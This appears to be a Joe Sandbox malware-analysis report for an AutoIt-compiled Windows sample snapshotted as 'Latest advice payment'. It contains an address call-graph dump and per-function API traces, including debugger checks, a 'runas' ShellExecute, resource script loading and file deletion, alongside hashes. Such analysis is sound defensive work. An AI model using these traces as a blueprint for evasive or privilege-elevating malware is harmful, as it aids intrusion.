102767->102769 102839 5657d4 102768->102839 102775 59e506 102769->102775 102772 580db6 Mailbox 59 API calls 102770->102772 102774 566bcf 102772->102774 102773 563bbb 102773->101730 102773->101754 102776 56522e 59 API calls 102774->102776 102777 56750f 59 API calls 102775->102777 102802 566bda Mailbox __NMSG_WRITE 102776->102802 102810 59e54f Mailbox 102777->102810 102778 566ce7 102907 565c6f 102778->102907 102780 59e740 102916 5c72df 59 API calls Mailbox 102780->102916 102782 566cf3 SetCurrentDirectoryW 102782->102768 102785 59e762 102917 5dfbce 59 API calls 2 library calls 102785->102917 102788 59e76f 102790 582d55 _free 58 API calls 102788->102790 102789 59e7d9 102920 5bf7a1 89 API calls 4 library calls 102789->102920 102790->102768 102793 56750f 59 API calls 102793->102810 102794 59e7f2 102794->102778 102795 59e7d1 102919 5bf5f7 59 API calls 4 library calls 102795->102919 102797 567de1 59 API calls 102797->102802 102801 5bf73d 59 API calls 102801->102810 102802->102778 102802->102789 102802->102795 102802->102797 102900 56586d 67 API calls _wcscpy 102802->102900 102901 566f5d GetStringTypeW 102802->102901 102902 566ecc 60 API calls __wcsnicmp 102802->102902 102903 566faa GetStringTypeW __NMSG_WRITE 102802->102903 102904 58363d GetStringTypeW _iswctype 102802->102904 102905 5668dc 165 API calls 3 library calls 102802->102905 102906 567213 59 API calls Mailbox 102802->102906 102803 567de1 59 API calls 102803->102810 102804 5c737f 59 API calls 102804->102810 102807 59e792 102918 5bf7a1 89 API calls 4 library calls 102807->102918 102809 59e7ab 102811 582d55 _free 58 API calls 102809->102811 102810->102780 102810->102793 102810->102801 102810->102803 102810->102804 102810->102807 102914 5bf65e 61 API calls 2 library calls 102810->102914 102915 567213 59 API calls Mailbox 102810->102915 102812 59e7be 102811->102812 102812->102768 102814 580db6 Mailbox 59 API calls 102813->102814 102815 5bf76d _memmove 102814->102815 102815->102712 102817 5c738a 102816->102817 102818 580db6 Mailbox 59 API calls 102817->102818 102819 5c73a1 102818->102819 102820 5c73b0 102819->102820 102821 567de1 59 API calls 102819->102821 102820->102712 102821->102820 102823 5675af 102822->102823 102827 567522 _memmove 102822->102827 102825 580db6 Mailbox 59 API calls 102823->102825 102824 580db6 Mailbox 59 API calls 102826 567529 102824->102826 102825->102827 102828 580db6 Mailbox 59 API calls 102826->102828 102829 567552 102826->102829 102827->102824 102828->102829 102829->102712 102831 567370 102830->102831 102835 56741e 102830->102835 102833 580db6 Mailbox 59 API calls 102831->102833 102834 5673a2 102831->102834 102832 580db6 59 API calls Mailbox 102832->102834 102833->102834 102834->102832 102834->102835 102835->102712 102836->102696 102837->102712 102838->102706 102840 565c6f CloseHandle 102839->102840 102841 5657dc Mailbox 102840->102841 102842 565c6f CloseHandle 102841->102842 102843 5657eb 102842->102843 102843->102773 102844->102726 102845->102728 102846->102736 102847->102757 102848->102735 102850 567667 59 API calls 102849->102850 102851 5645b1 102850->102851 102852 567667 59 API calls 102851->102852 102853 5645b9 102852->102853 102854 567667 59 API calls 102853->102854 102855 5645c1 102854->102855 102856 567667 59 API calls 102855->102856 102857 5645c9 102856->102857 102858 59d4d2 102857->102858 102859 5645fd 102857->102859 102860 568047 59 API calls 102858->102860 102861 56784b 59 API calls 102859->102861 102862 59d4db 102860->102862 102863 56460b 102861->102863 102864 567d8c 59 API calls 102862->102864 102865 567d2c 59 API calls 102863->102865 102868 564640 102864->102868 102866 564615 102865->102866 102866->102868 102869 56784b 59 API calls 102866->102869 102867 564680 102870 56784b 59 API calls 102867->102870 102868->102867 102871 56465f 102868->102871 102881 59d4fb 102868->102881 102872 564636 102869->102872 102874 564691 102870->102874 102873 5679f2 59 API calls 102871->102873 102876 567d2c 59 API calls 102872->102876 102878 564669 102873->102878 102879 5646a3 102874->102879 102882 568047 59 API calls 102874->102882 102875 59d5cb 102877 567bcc 59 API calls 102875->102877 102876->102868 102895 59d588 102877->102895 102878->102867 102886 56784b 59 API calls 102878->102886 102880 5646b3 102879->102880 102883 568047 59 API calls 102879->102883 102885 5646ba 102880->102885 102887 568047 59 API calls 102880->102887 102881->102875 102884 59d5b4 102881->102884 102894 59d532 102881->102894 102882->102879 102883->102880 102884->102875 102890 59d59f 102884->102890 102888 568047 59 API calls 102885->102888 102897 5646c1 Mailbox 102885->102897 102886->102867 102887->102885 102888->102897 102889 5679f2 59 API calls 102889->102895 102893 567bcc 59 API calls 102890->102893 102891 59d590 102892 567bcc 59 API calls 102891->102892 102892->102895 102893->102895 102894->102891 102898 59d57b 102894->102898 102895->102867 102895->102889 102921 567924 59 API calls 2 library calls 102895->102921 102897->102755 102899 567bcc 59 API calls 102898->102899 102899->102895 102900->102802 102901->102802 102902->102802 102903->102802 102904->102802 102905->102802 102906->102802 102908 565c88 102907->102908 102909 565c79 102907->102909 102908->102909 102910 565c8d CloseHandle 102908->102910 102909->102782 102910->102909 102911->102725 102912->102732 102913->102760 102914->102810 102915->102810 102916->102785 102917->102788 102918->102809 102919->102789 102920->102794 102921->102895 102923 566d95 102922->102923 102924 566ea9 102922->102924 102923->102924 102925 580db6 Mailbox 59 API calls 102923->102925 102924->101870 102927 566dbc 102925->102927 102926 580db6 Mailbox 59 API calls 102928 566e31 102926->102928 102927->102926 102928->102924 102930 56735d 59 API calls 102928->102930 102932 56750f 59 API calls 102928->102932 102935 566240 102928->102935 102960 5b6553 59 API calls Mailbox 102928->102960 102930->102928 102932->102928 102933->101872 102934->101874 102936 567a16 59 API calls 102935->102936 102943 566265 102936->102943 102937 56646a 102938 56750f 59 API calls 102937->102938 102939 566484 Mailbox 102938->102939 102939->102928 102942 566799 _memmove 102966 5bf8aa 91 API calls 4 library calls 102942->102966 102943->102937 102943->102942 102944 59dff6 102943->102944 102945 56750f 59 API calls 102943->102945 102950 567d8c 59 API calls 102943->102950 102953 59df92 102943->102953 102957 567e4f 59 API calls 102943->102957 102961 565f6c 60 API calls 102943->102961 102962 565d41 59 API calls Mailbox 102943->102962 102963 565e72 60 API calls 102943->102963 102964 567924 59 API calls 2 library calls 102943->102964 102965 5bf8aa 91 API calls 4 library calls 102944->102965 102945->102943 102948 59e004 102951 56750f 59 API calls 102948->102951 102950->102943 102952 59e01a 102951->102952 102952->102939 102954 568029 59 API calls 102953->102954 102956 59df9d 102954->102956 102959 580db6 Mailbox 59 API calls 102956->102959 102958 56643b CharUpperBuffW 102957->102958 102958->102943 102959->102942 102960->102928 102961->102943 102962->102943 102963->102943 102964->102943 102965->102948 102966->102939 102967->101888 102968->101889 102970 56e6d5 102969->102970 102971 5a3aa9 102970->102971 102974 56e73f 102970->102974 102984 56e799 102970->102984 102972 569ea0 331 API calls 102971->102972 102973 5a3abe 102972->102973 102999 56e970 Mailbox 102973->102999 103121 5c9e4a 89 API calls 4 library calls 102973->103121 102976 567667 59 API calls 102974->102976 102974->102984 102975 567667 59 API calls 102975->102984 102978 5a3b04 102976->102978 102980 582d40 __cinit 67 API calls 102978->102980 102979 582d40 __cinit 67 API calls 102979->102984 102980->102984 102981 5a3b26 102981->101967 102982 5c9e4a 89 API calls 102982->102999 102983 5684c0 69 API calls 102983->102999 102984->102975 102984->102979 102984->102981 102986 56e95a 102984->102986 102984->102999 102985 569ea0 331 API calls 102985->102999 102986->102999 103122 5c9e4a 89 API calls 4 library calls 102986->103122 102988 568d40 59 API calls 102988->102999 102996 56f195 103126 5c9e4a 89 API calls 4 library calls 102996->103126 102997 5a3e25 102997->101967 102998 56ea78 102998->101967 102999->102982 102999->102983 102999->102985 102999->102988 102999->102996 102999->102998 103120 567f77 59 API calls 2 library calls 102999->103120 103123 5b6e8f 59 API calls 102999->103123 103124 5dc5c3 331 API calls 102999->103124 103125 5db53c 331 API calls Mailbox 102999->103125 103127 569c90 59 API calls Mailbox 102999->103127 103128 5d93c6 331 API calls Mailbox 102999->103128 103001 56f650 103000->103001 103002 56f4ba 103000->103002 103005 567de1 59 API calls 103001->103005 103003 56f4c6 103002->103003 103004 5a441e 103002->103004 103221 56f290 331 API calls 2 library calls 103003->103221 103223 5dbc6b 331 API calls Mailbox 103004->103223 103011 56f58c Mailbox 103005->103011 103008 5a442c 103012 56f630 103008->103012 103224 5c9e4a 89 API calls 4 library calls 103008->103224 103010 56f4fd 103010->103008 103010->103011 103010->103012 103018 564e4a 84 API calls 103011->103018 103129 5ccb7a 103011->103129 103209 5c3c37 103011->103209 103212 5d445a 103011->103212 103012->101967 103014 56f5e3 103014->103012 103222 569c90 59 API calls Mailbox 103014->103222 103018->103014 103381 568180 103019->103381 103021 56fd3d 103023 5a472d 103021->103023 103062 5706f6 103021->103062 103386 56f234 103021->103386 103403 5c9e4a 89 API calls 4 library calls 103023->103403 103026 5a488d 103033 56fe4c 103026->103033 103084 5a4742 103026->103084 103409 5da2d9 85 API calls Mailbox 103026->103409 103027 56fe3e 103027->103026 103027->103033 103407 5b66ec 59 API calls 2 library calls 103027->103407 103028 570517 103038 580db6 Mailbox 59 API calls 103028->103038 103029 5a4b53 103029->103084 103420 5c9e4a 89 API calls 4 library calls 103029->103420 103031 580db6 59 API calls Mailbox 103061 56fdd3 103031->103061 103033->103029 103039 5a48f9 103033->103039 103390 56837c 103033->103390 103034 5a47d7 103034->103084 103405 5c9e4a 89 API calls 4 library calls 103034->103405 103035 5a4848 103408 5b60ef 59 API calls 2 library calls 103035->103408 103048 570545 _memmove 103038->103048 103049 5a4917 103039->103049 103411 5685c0 59 API calls Mailbox 103039->103411 103042 5a4755 103042->103034 103404 56f6a3 331 API calls 103042->103404 103044 56fea4 103054 56ff32 103044->103054 103055 5a4ad6 103044->103055 103077 570179 Mailbox _memmove 103044->103077 103045 5a486b 103050 569ea0 331 API calls 103045->103050 103046 5a48b2 Mailbox 103046->103033 103410 5b66ec 59 API calls 2 library calls 103046->103410 103056 580db6 Mailbox 59 API calls 103048->103056 103052 5a4928 103049->103052 103412 5685c0 59 API calls Mailbox 103049->103412 103050->103026 103052->103077 103413 5b60ab 59 API calls Mailbox 103052->103413 103058 580db6 Mailbox 59 API calls 103054->103058 103418 5c9ae7 60 API calls 103055->103418 103065 570106 _memmove 103056->103065 103063 56ff39 103058->103063 103061->103027 103061->103028 103061->103031 103061->103042 103061->103048 103064 569ea0 331 API calls 103061->103064 103072 5a480c 103061->103072 103061->103084 103402 5c9e4a 89 API calls 4 library calls 103062->103402 103063->103062 103064->103061 103065->103077 103098 570162 103065->103098 103401 569c90 59 API calls Mailbox 103065->103401 103066 569ea0 331 API calls 103069 5a4a87 103066->103069 103067 56ffe6 103073 5684c0 69 API calls 103069->103073 103069->103084 103406 5c9e4a 89 API calls 4 library calls 103072->103406 103076 5a4ab2 103073->103076 103417 5c9e4a 89 API calls 4 library calls 103076->103417 103077->103062 103077->103076 103083 580db6 59 API calls Mailbox 103077->103083 103085 570398 103077->103085 103092 5a4a1c 103077->103092 103097 5a4a4d 103077->103097 103399 568740 68 API calls __cinit 103077->103399 103400 568660 68 API calls 103077->103400 103414 5c5937 68 API calls 103077->103414 103415 5689b3 69 API calls Mailbox 103077->103415 103416 569d3c 60 API calls Mailbox 103077->103416 103083->103077 103085->101967 103094 580db6 Mailbox 59 API calls 103092->103094 103094->103097 103097->103066 103098->101967 103099->101967 103100->101967 103101->101897 103102->101902 103103->101967 103104->101904 103105->101904 103106->101904 103107->101967 103108->101967 103109->101967 103110->101967 103111->101967 103112->101967 103113->101950 103114->101950 103115->101950 103116->101950 103117->101950 103118->101950 103119->101950 103120->102999 103121->102999 103122->102999 103123->102999 103124->102999 103125->102999 103126->102997 103127->102999 103128->102999 103130 567667 59 API calls 103129->103130 103131 5ccbaf 103130->103131 103132 567667 59 API calls 103131->103132 103133 5ccbb8 103132->103133 103134 5ccbcc 103133->103134 103334 569b3c 59 API calls 103133->103334 103136 569837 84 API calls 103134->103136 103137 5ccbe9 103136->103137 103138 5cccea 103137->103138 103139 5ccc0b 103137->103139 103150 5ccd1a Mailbox 103137->103150 103141 564ddd 136 API calls 103138->103141 103140 569837 84 API calls 103139->103140 103143 5ccc17 103140->103143 103142 5cccfe 103141->103142 103144 5ccd16 103142->103144 103147 564ddd 136 API calls 103142->103147 103145 568047 59 API calls 103143->103145 103148 567667 59 API calls 103144->103148 103144->103150 103146 5ccc23 103145->103146 103152 5ccc69 103146->103152 103153 5ccc37 103146->103153 103147->103144 103149 5ccd4b 103148->103149 103151 567667 59 API calls 103149->103151 103150->103014 103156 569837 84 API calls 103152->103156 103155 568047 59 API calls 103153->103155 103158 5ccc47 103155->103158 103376 5c445a GetFileAttributesW 103209->103376 103213 569837 84 API calls 103212->103213 103214 5d4494 103213->103214 103215 566240 94 API calls 103214->103215 103216 5d44a4 103215->103216 103217 5d44c9 103216->103217 103218 569ea0 331 API calls 103216->103218 103220 5d44cd 103217->103220 103380 569a98 59 API calls Mailbox 103217->103380 103218->103217 103220->103014 103221->103010 103222->103014 103223->103008 103224->103012 103334->103134 103377 5c4475 FindFirstFileW 103376->103377 103379 5c3c3e 103376->103379 103378 5c448a FindClose 103377->103378 103377->103379 103378->103379 103379->103014 103380->103220 103382 56818f 103381->103382 103385 5681aa 103381->103385 103383 567e4f 59 API calls 103382->103383 103384 568197 CharUpperBuffW 103383->103384 103384->103385 103385->103021 103387 56f251 103386->103387 103388 56f272 103387->103388 103421 5c9e4a 89 API calls 4 library calls 103387->103421 103388->103061 103391 59edbd 103390->103391 103392 56838d 103390->103392 103393 580db6 Mailbox 59 API calls 103392->103393 103394 568394 103393->103394 103395 5683b5 103394->103395 103422 568634 59 API calls Mailbox 103394->103422 103395->103039 103395->103044 103399->103077 103400->103077 103401->103065 103402->103023 103403->103084 103404->103034 103405->103084 103406->103084 103407->103035 103408->103045 103409->103046 103410->103046 103411->103049 103412->103052 103413->103077 103414->103077 103415->103077 103416->103077 103417->103084 103418->103067 103420->103084 103421->103388 103422->103395

                                                            Executed Functions

                                                            Function 00563B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00563B68
                                                            • IsDebuggerPresent.KERNEL32 ref: 00563B7A
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,006252F8,006252E0,?,?), ref: 00563BEB
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                              • Part of subcall function 0057092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00563C14,006252F8,?,?,?), ref: 0057096E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00563C6F
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00617770,00000010), ref: 0059D281
                                                            • SetCurrentDirectoryW.KERNEL32(?,006252F8,?,?,?), ref: 0059D2B9
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00614260,006252F8,?,?,?), ref: 0059D33F
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 0059D346
                                                              • Part of subcall function 00563A46: GetSysColorBrush.USER32(0000000F), ref: 00563A50
                                                              • Part of subcall function 00563A46: LoadCursorW.USER32(00000000,00007F00), ref: 00563A5F
                                                              • Part of subcall function 00563A46: LoadIconW.USER32(00000063), ref: 00563A76
                                                              • Part of subcall function 00563A46: LoadIconW.USER32(000000A4), ref: 00563A88
                                                              • Part of subcall function 00563A46: LoadIconW.USER32(000000A2), ref: 00563A9A
                                                              • Part of subcall function 00563A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00563AC0
                                                              • Part of subcall function 00563A46: RegisterClassExW.USER32(?), ref: 00563B16
                                                              • Part of subcall function 005639D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00563A03
                                                              • Part of subcall function 005639D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00563A24
                                                              • Part of subcall function 005639D5: ShowWindow.USER32(00000000,?,?), ref: 00563A38
                                                              • Part of subcall function 005639D5: ShowWindow.USER32(00000000,?,?), ref: 00563A41
                                                              • Part of subcall function 0056434A: _memset.LIBCMT ref: 00564370
                                                              • Part of subcall function 0056434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00564415
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas$%_
                                                            • API String ID: 529118366-1402309776
                                                            • Opcode ID: 5401cee2a52a69d970e6a984000cf238ed06da479bb44158fd4d9b4decd16897
                                                            • Instruction ID: 7af73d91b20edb1a20c05c168358e3ff6ee92d3c16a0ecd48fca17e538ee7eed
                                                            • Opcode Fuzzy Hash: 5401cee2a52a69d970e6a984000cf238ed06da479bb44158fd4d9b4decd16897
                                                            • Instruction Fuzzy Hash: 6351133090994AEADF21EBB4EC49DFD7F7ABF99304F004065F452A71A2DA705B46CB21
                                                            Function 005649A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 005649CD
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            • GetCurrentProcess.KERNEL32(?,005EFAEC,00000000,00000000,?), ref: 00564A9A
                                                            • IsWow64Process.KERNEL32(00000000), ref: 00564AA1
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00564AE7
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00564AF2
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00564B23
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00564B2F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: ccb0f5f06a05bade43ff7905141f5efb442999d2580e3872bb0eba9a9b94cc64
                                                            • Instruction ID: 205caa28aceaced2e21965a3e0009194eb6680f21f714fc98ba6e9e4930c48bf
                                                            • Opcode Fuzzy Hash: ccb0f5f06a05bade43ff7905141f5efb442999d2580e3872bb0eba9a9b94cc64
                                                            • Instruction Fuzzy Hash: 0191D5319897C5DECB31DBA885501AEFFF5BF3A300B444DADD0CB97A02D620A548DB69
                                                            Function 00564E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00564D8E,?,?,00000000,00000000), ref: 00564E99
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00564D8E,?,?,00000000,00000000), ref: 00564EB0
                                                            • LoadResource.KERNEL32(?,00000000,?,?,00564D8E,?,?,00000000,00000000,?,?,?,?,?,?,00564E2F), ref: 0059D937
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00564D8E,?,?,00000000,00000000,?,?,?,?,?,?,00564E2F), ref: 0059D94C
                                                            • LockResource.KERNEL32(00564D8E,?,?,00564D8E,?,?,00000000,00000000,?,?,?,?,?,?,00564E2F,00000000), ref: 0059D95F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: 240a4f7224d2daa70cd4322b0ea9c30a8c38a0111794dfbfa8b887b2c7104b87
                                                            • Instruction ID: e0d1ae648056e45ef1cfc7feeb297ff998b67056627973a14664d04e5e04f8ac
                                                            • Opcode Fuzzy Hash: 240a4f7224d2daa70cd4322b0ea9c30a8c38a0111794dfbfa8b887b2c7104b87
                                                            • Instruction Fuzzy Hash: CF119EB5200341BFD7248BA5EC88F277BBEFBC5B11F104268F5558A250DB62EC049A61
                                                            Function 0056FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: pbb$%_
                                                            • API String ID: 3964851224-893687122
                                                            • Opcode ID: 5d0a537a79f816b04def638d0e4f03c46fafb42d5fc98b468287e80a037f9e60
                                                            • Instruction ID: fdbfb61f4d71998ed2206089a25c2b7cae4f3b96d6c563eada94019f48e45c56
                                                            • Opcode Fuzzy Hash: 5d0a537a79f816b04def638d0e4f03c46fafb42d5fc98b468287e80a037f9e60
                                                            • Instruction Fuzzy Hash: 0C926770608342CFD720DF24D484B2ABBE5BF85304F14996DE88A9B3A2D775EC45DB92
                                                            Function 005C445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,0059E398), ref: 005C446A
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 005C447B
                                                            • FindClose.KERNEL32(00000000), ref: 005C448B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 3a42d6cf0dccb814f57ec00263c5bf6a343dc173ec0e7f01830ae2dd0c747b53
                                                            • Instruction ID: 4f19bac29aecf90f5a39aab5f736c2eed0af460143b5f57caabc5405cbcaadfe
                                                            • Opcode Fuzzy Hash: 3a42d6cf0dccb814f57ec00263c5bf6a343dc173ec0e7f01830ae2dd0c747b53
                                                            • Instruction Fuzzy Hash: 1FE0D8368105406B46186B78EC8DDED7B5CAE15335F204B19F976C50D0EB745D04AAD5
                                                            Function 005709D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00570A5B
                                                            • timeGetTime.WINMM ref: 00570D16
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00570E53
                                                            • Sleep.KERNEL32(0000000A), ref: 00570E61
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00570EFA
                                                            • DestroyWindow.USER32 ref: 00570F06
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00570F20
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 005A4E83
                                                            • TranslateMessage.USER32(?), ref: 005A5C60
                                                            • DispatchMessageW.USER32(?), ref: 005A5C6E
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005A5C82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbb$pbb$pbb$pbb
                                                            • API String ID: 4212290369-3775333826
                                                            • Opcode ID: 3a858e563bc843714bfec085889d327d31afc00639951b741ba0791c479c2cb6
                                                            • Instruction ID: f12676ba6f9c2681d0378a5a40dc1119dbe946e8dfb5108f4aa595236b6cc5a1
                                                            • Opcode Fuzzy Hash: 3a858e563bc843714bfec085889d327d31afc00639951b741ba0791c479c2cb6
                                                            • Instruction Fuzzy Hash: 23B29E70608742DFD728DB24C888FAEBFE5BF85304F14891DE58A972A1DB70E845DB42
                                                            Function 005C9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005C8F5F: __time64.LIBCMT ref: 005C8F69
                                                              • Part of subcall function 00564EE5: _fseek.LIBCMT ref: 00564EFD
                                                            • __wsplitpath.LIBCMT ref: 005C9234
                                                              • Part of subcall function 005840FB: __wsplitpath_helper.LIBCMT ref: 0058413B
                                                            • _wcscpy.LIBCMT ref: 005C9247
                                                            • _wcscat.LIBCMT ref: 005C925A
                                                            • __wsplitpath.LIBCMT ref: 005C927F
                                                            • _wcscat.LIBCMT ref: 005C9295
                                                            • _wcscat.LIBCMT ref: 005C92A8
                                                              • Part of subcall function 005C8FA5: _memmove.LIBCMT ref: 005C8FDE
                                                              • Part of subcall function 005C8FA5: _memmove.LIBCMT ref: 005C8FED
                                                            • _wcscmp.LIBCMT ref: 005C91EF
                                                              • Part of subcall function 005C9734: _wcscmp.LIBCMT ref: 005C9824
                                                              • Part of subcall function 005C9734: _wcscmp.LIBCMT ref: 005C9837
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 005C9452
                                                            • _wcsncpy.LIBCMT ref: 005C94C5
                                                            • DeleteFileW.KERNEL32(?,?), ref: 005C94FB
